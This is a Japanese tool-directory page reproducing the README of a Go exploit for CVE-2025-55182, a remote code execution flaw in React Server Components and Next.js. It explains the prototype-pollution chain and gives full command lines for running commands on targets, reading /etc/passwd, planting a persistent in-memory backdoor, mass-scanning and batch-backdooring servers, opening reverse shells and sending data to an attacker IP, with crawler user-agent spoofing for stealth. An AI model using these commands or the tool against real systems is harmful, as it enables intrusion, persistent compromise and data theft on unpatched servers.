Skip to content
KitploitKITPLOIT
ツールブログ
Log in
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

フィードお問い合わせプライバシー© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-55182-golang-PoC — CVE-2025-55182のGoベースの概念実証。React Server Componentsの重大なRCE。脆弱性チェック、コマンド実行、メモリシェルインジェクション、リバースシェル、バッチスキャン、プロキシサポートを認可されたセキュリティテスト用に備える。 | Kitploit
ツール/GitHubGitHub/keklick1337/cve-2025-55182-golang-poc
脆弱性分析エクスプロイトウェブアプリケーション悪用ポストエクスプロイトペネトレーションテストコマンド&コントロールレッドチーミングリモートアクセスツールペイロード開発
GitHubkeklick1337/cve-2025-55182-golang-poc

CVE-2025-55182-golang-PoC

CVE-2025-55182のGoベースの概念実証。React Server Componentsの重大なRCE。脆弱性チェック、コマンド実行、メモリシェルインジェクション、リバースシェル、バッチスキャン、プロキシサポートを認可されたセキュリティテスト用に備える。

リポジトリを見るウェブサイト
6199ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-55182 React Server Components RCE - Go PoC

⚠️ 認可されたセキュリティテスト専用 ⚠️

説明

CVE-2025-55182 (別名 CVE-2025-66478) は、React Server Components (Flight プロトコル) における重大なリモートコード実行 (RCE) の脆弱性です。このツールは、セキュリティ研究および認可されたペネトレーションテストを目的とした PoC の Go 実装です。

影響を受けるバージョン:

  • react-server-dom-webpack: 19.0.0 - 19.2.0
  • Next.js: 15.x (パッチ適用前: 15.0.5、15.1.9、15.2.6、15.3.6、15.4.8、15.5.7)
  • Next.js: 16.x (16.0.7 より前)
  • Next.js: 14.3.0-canary.77 以降のカナリーバージョン

脆弱性の詳細

このエクスプロイトは、Flight プロトコルのデシリアライゼーションにおけるプロトタイプ汚染 (prototype pollution) を利用します:

  1. $@ デシリアライゼーションを使用して Chunk 参照を取得する
  2. Chunk.prototype.then をルートオブジェクトの then プロパティとして配置する
  3. ステータスを RESOLVED_MODEL に設定し、制御された偽のチャンクで initializeModelChunk を呼び出す
  4. Blob のデシリアライゼーションをトリガーし、攻撃者のペイロードで response._formData.get を呼び出す
  5. 任意のコード実行のために response._formData.get を Function コンストラクタに設定する

特徴

  • 完全な RCE 機能 - 出力付きで任意のコマンドを実行
  • 脆弱性チェックモード - 悪用を行わない安全な検出
  • Next.js バージョン検出 - 自動バージョンフィンガープリンティング
  • メモリシェル注入 - /exec?cmd= に持続的バックドアを設置
  • バッチスキャン - JSON 出力対応のマルチスレッドスキャン
  • 包括的なプロキシサポート:
    • 認証あり/なしの SOCKS5
    • SOCKS4/SOCKS4a
    • 認証あり/なしの HTTP/HTTPS プロキシ
  • ステルスモード - ブラウザ、クローラー、セキュリティの User-Agent
  • レート制限 - リクエスト間の遅延を設定可能
  • リバースシェル - mkfifo + nc (Alpine/busybox で動作)
  • データ外部送信 - コマンド出力を攻撃者サーバーに POST 送信
  • クロスプラットフォームビルド - 30 以上の OS/アーキテクチャの組み合わせ
  • JSON 出力 - 自動化のための機械可読な結果

インストール

ビルド済みバイナリ

GitHub Releases からお使いのプラットフォーム向けの最新リリースをダウンロードしてください。

利用可能なバイナリ:

  • Linux: amd64、386、arm、arm64、mips、mipsle、mips64、riscv64、ppc64、s390x
  • Windows: amd64、386、arm64
  • macOS: amd64 (Intel)、arm64 (Apple Silicon)
  • FreeBSD、OpenBSD、NetBSD: amd64、386、arm、arm64
  • 他にも多数...

ソースから

# Clone repository
git clone https://github.com/keklick1337/CVE-2025-55182-golang-PoC.git
cd CVE-2025-55182-golang-PoC

# Build for current platform
go build -o cve-2025-55182 .

# Or build for all platforms
chmod +x build.sh
./build.sh

ソースからのビルド

./build.sh を実行すると、サポートされているすべてのプラットフォーム向けのバイナリが build/ ディレクトリに生成されます。

使用方法

基本的なコマンド

# Check single target for vulnerability
./cve-2025-55182 -u http://target:3000 --check

# Detect Next.js version
./cve-2025-55182 -u http://target:3000 --version-check

# Execute command with output
./cve-2025-55182 -u http://target:3000 -c "id"
./cve-2025-55182 -u http://target:3000 -c "cat /etc/passwd"

メモリシェル (持続的バックドア)

# Inject memory shell (checks if already installed first)
./cve-2025-55182 -u http://target:3000 --memshell

# Test if memory shell is active
./cve-2025-55182 -u http://target:3000 --test-shell

# Execute command via memory shell
./cve-2025-55182 -u http://target:3000 --shell-exec "cat /etc/passwd"

# After injection, you can also use curl directly:
curl 'http://target:3000/exec?cmd=id'
curl 'http://target:3000/exec?cmd=whoami'

カスタムヘッダー & SSL バイパス

# Add custom headers (can be used multiple times)
./cve-2025-55182 -u http://target:3000 --check -H 'Authorization: Bearer token123'
./cve-2025-55182 -u http://target:3000 --check -H 'Host: example.com' -H 'X-Forwarded-For: 127.0.0.1'

# Skip SSL certificate verification (for self-signed certs)
./cve-2025-55182 -u https://target:3000 --check -k
./cve-2025-55182 -u https://target:3000 --check --insecure

# Combine with other options
./cve-2025-55182 -u https://target:3000 -c "id" -k -H 'Cookie: session=abc123' --proxy socks5://127.0.0.1:1080

プロキシサポート

# SOCKS5 with authentication
./cve-2025-55182 -u http://target:3000 --check --proxy socks5://user:[email protected]:1080

# SOCKS5 without authentication
./cve-2025-55182 -u http://target:3000 --check --proxy socks5://127.0.0.1:1080

# SOCKS4 proxy
./cve-2025-55182 -u http://target:3000 --check --proxy socks4://127.0.0.1:1080

# HTTP proxy
./cve-2025-55182 -u http://target:3000 --check --proxy http://127.0.0.1:8080

バッチスキャン

# Batch check from file
./cve-2025-55182 --urls targets.txt --check

# Batch scan with JSON output
./cve-2025-55182 --urls targets.txt --check --json -o results.json

# Batch scan with multiple threads and stealth
./cve-2025-55182 -f targets.txt --check --threads 20 --stealth crawler --delay 2s

# Save vulnerable targets to file
./cve-2025-55182 -f targets.txt --check -o vulnerable.txt

# Batch memory shell injection
./cve-2025-55182 --urls targets.txt --memshell --workers 10

# Batch command execution
./cve-2025-55182 --urls targets.txt -c "id" --threads 5

ネットワーク外部送信

# Reverse shell (mkfifo + nc, works on Alpine)
./cve-2025-55182 -u http://target:3000 --revshell 10.0.0.1 4444

# Start listener on attacker machine first:
nc -lvnp 4444

# Exfiltrate command output via HTTP POST
./cve-2025-55182 -u http://target:3000 --exfil "cat /etc/passwd" 10.0.0.1 4444

# Start listener: nc -lvnp 4444

オプション

OptionDescription
-u, --urlターゲット URL (例: http://localhost:3000)
-f, --fileターゲット URL の一覧を含むファイル (1 行に 1 つ)
--urls-f/--file のエイリアス
-o, --output脆弱なターゲットを保存する出力ファイル
--json結果を JSON 形式で出力
-c, --command実行するコマンド (出力付き)
--check脆弱性をチェック
--version-checkNext.js のバージョンを検出
--proxyプロキシ URL (socks5://user:pass@ip:port、socks4://ip:port、http://ip:port)
-H, --headerカスタムヘッダー (複数回使用可能)
-k, --insecureSSL/TLS 証明書の検証をスキップ
--stealthステルスモード: browser、crawler、security (デフォルト: browser)
--delayリクエスト間の遅延 (例: 2s、500ms)
--variants徹底的なチェックのために複数のペイロードバリアントを使用
--memshellメモリシェルを注入 (持続的バックドア)
--test-shellメモリシェルがアクティブかテスト
--shell-execメモリシェル経由でコマンドを実行
--revshell IP PORTリバースシェルを確立
--exfil CMD IP PORTコマンドを実行し、出力を POST 送信
-t, --timeoutリクエストタイムアウト (秒) (デフォルト: 15)
--threads同時実行スレッド数 (デフォルト: 10)
--workers--threads のエイリアス
--nocolor色付き出力を無効化 (Windows/パイプ用)
-h, --helpヘルプメッセージを表示
-v, --versionバージョンを表示

プロキシの種類

socks5://user:pass@ip:port  - SOCKS5 with authentication
socks5://ip:port            - SOCKS5 without authentication  
socks5h://ip:port           - SOCKS5 with remote DNS resolution
socks4://ip:port            - SOCKS4 proxy
socks4a://ip:port           - SOCKS4a proxy
http://user:pass@ip:port    - HTTP proxy with authentication
http://ip:port              - HTTP proxy without authentication
https://ip:port             - HTTPS proxy

ステルスモード

ModeDescription
browser実際のブラウザのリクエストを模倣 (Chrome、Firefox、Safari、Edge) - デフォルト
crawler検索エンジンのクローラーを模倣 (Googlebot、Bingbot、Baiduspider など)
securityセキュリティスキャナーの User-Agent を使用 (Nessus、Nuclei)

メモリシェル

メモリシェル機能は、以下の動作を行う持続的バックドアを注入します:

  1. 事前チェック - 注入前に、シェルがすでにインストールされているかを確認
  2. http.Server.prototype.emit をフック - すべての HTTP リクエストを傍受
  3. /exec エンドポイントを作成 - cmd クエリパラメータを受け付ける
  4. 再起動まで持続 - サーバーメモリ内に残存
# After injection:
curl 'http://target:3000/exec?cmd=id'
curl 'http://target:3000/exec?cmd=ls+-la'
curl 'http://target:3000/exec?cmd=cat+/etc/passwd'

プロジェクト構成

.
├── main.go                   # CLI entry point
├── pkg/
│   ├── colors/
│   │   └── colors.go         # Terminal colors with --nocolor support
│   ├── exploit/
│   │   └── exploit.go        # Core exploit logic, memory shell, version detection
│   ├── proxy/
│   │   └── proxy.go          # SOCKS4/5, HTTP proxy support
│   ├── scanner/
│   │   └── scanner.go        # Batch scanning with JSON output
│   └── stealth/
│       └── stealth.go        # User-Agent randomization
├── build.sh                  # Cross-platform build script
├── go.mod                    # Go module file
├── go.sum                    # Go dependencies
└── README.md                 # This file

クロスプラットフォームビルド

build.sh スクリプトは 30 以上のプラットフォーム向けにビルドします:

ツールをダウンロード